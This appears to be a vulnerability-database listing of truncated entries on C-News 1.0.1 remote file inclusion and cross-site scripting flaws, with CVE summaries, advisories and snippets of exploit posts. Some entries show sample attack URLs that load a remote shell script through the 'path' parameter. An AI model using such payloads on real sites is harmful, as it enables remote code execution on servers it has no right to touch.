EUVD-2008-2216

Malware in sbrugna...

EUVD-2006-4627

Malware in sbrugna...

C-News <= 1.0.1 (path) Remote File Inclusion Vulnerability

No description provided by source. ============================================================================================== C-News = v1.0.1 path Remote File Inclusion Exploit =============================================================================================== Critical Level :...

C-News 1.0.1 - 'install.php' Cross Site Scripting Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/28989/info C-News is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an...

CVE-2008-2219

Cross-site scripting XSS vulnerability in install.php in C-News.fr C-News 1.0.1 allows remote attackers to inject arbitrary web script or HTML via the etape parameter...

CVE-2008-2219

Cross-site scripting XSS vulnerability in install.php in C-News.fr C-News 1.0.1 allows remote attackers to inject arbitrary web script or HTML via the etape parameter...

CVE-2008-2219

CVE-2008-2219 is a cross-site scripting (XSS) vulnerability affecting C-News.fr C-News 1.0.1. The issue resides in install.php, where an attacker can inject arbitrary web script or HTML through the etape parameter. The provided documents do not specify a patch or mitigation, exploit details, or a...

C-News 1.0.1 - install.php Cross-Site Scripting

C-News 1.0.1 - install.php Cross-Site Scripting source: https://www.securityfocus.com/bid/28989/info C-News is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the brows...

C-News 1.0.1 - &#039;install.php&#039; Cross-Site Scripting

source: https://www.securityfocus.com/bid/28989/info C-News is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the...

C-News Commentaires.PHP远程文件包含漏洞

C-News是一款基于PHP的新闻管理程序。 C-News不正确过滤用户提交的URI数据，远程攻击者可以利用漏洞以WEB进程权限执行任意命令。 问题是由于'Commentaires.PHP'脚本对用户提交的'path'参数缺少过滤，提交恶意的远程服务器作为包含对象，可导致以WEB进程权限执行任意PHP代码。 C-News C-News 1.0.1 http://www.c-news.fr/ http://www.example.com/Script Path/affichage/commentaires.php?path=http://www.example2.com/shell.php...

Update Protection against C-News 'path' Parameter File Inclusion Vulnerability

C-News, a script executed in XHTML/CSS that webmasters use for easy PHP and JavaScript presentation, is prone to a remote file inclusion vulnerability. An attacker can exploit this vulnerability to execute arbitrary PHP code on an affected system via a maliciously crafted URL in the 'path'...

cnews101.txt

C-News v 1.0.1 Multiple Remote File Include Vulnerabilities ; Discovred By : ThELeO ; Software : C-News v 1.0.1 ; Exploit : http://Www.Example.Com/Script/affichage/pagination.php?path=U r Evil Script ; http://Www.Example.Com/Script/affichage/formulairecommentaires.php?path=U r Evil Script Greetz ...

C-News v 1.0.1 &lt; = Multiple Remote File Include Vulnerabilities

C-News v 1.0.1 = = = = = = = = = = = = = Multiple Remote File Include Vulnerabilities ; Discovred By : ThELeO ; Software : C-News v 1.0.1 ; Exploit : http://Www.Example.Com/Script/affichage/pagination.php?path=U r Evil Script ;...

CVE-2006-4639

Multiple PHP remote file inclusion vulnerabilities in C-News.fr C-News 1.0.1 and earlier, when registerglobals is enabled, allow remote attackers to execute arbitrary PHP code via a URL in the path parameter in 1 formulairecommentaires.php, 2 affichage/listenews.php, 3 affichage/newscomplete.php,...

CVE-2006-4629

PHP remote file inclusion vulnerability in affichage/commentaires.php in C-News.fr C-News 1.0.1 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the path parameter...

CVE-2006-4639

CVE-2006-4639 describes multiple PHP remote file inclusion vulnerabilities in the C-News(fr) application, specifically versions up to 1.0.1 where register_globals is enabled. The flaw allows an attacker to cause arbitrary PHP code execution by supplying a URL in the path parameter through files: ...

CVE-2006-4629

C-News (C-News 1.0.1 and earlier) is affected by a PHP remote file inclusion in affichage/commentaires.php, exploitable via a URL in the path parameter to achieve arbitrary PHP code execution. Affected component/file: commentaires.php within C-News. Root cause: improper handling of the path param...

CVE-2006-4629

PHP remote file inclusion vulnerability in affichage/commentaires.php in C-News.fr C-News 1.0.1 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the path parameter...

EUVD-2006-4617

PHP remote file inclusion vulnerability in affichage/commentaires.php in C-News.fr C-News 1.0.1 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the path parameter...

C-News &lt;= v1.0.1 &#40;path&#41; Remote File Inclusion Exploit

============================================================================================== C-News = v1.0.1 path Remote File Inclusion Exploit =============================================================================================== Critical Level : Dangerous Venedor site :...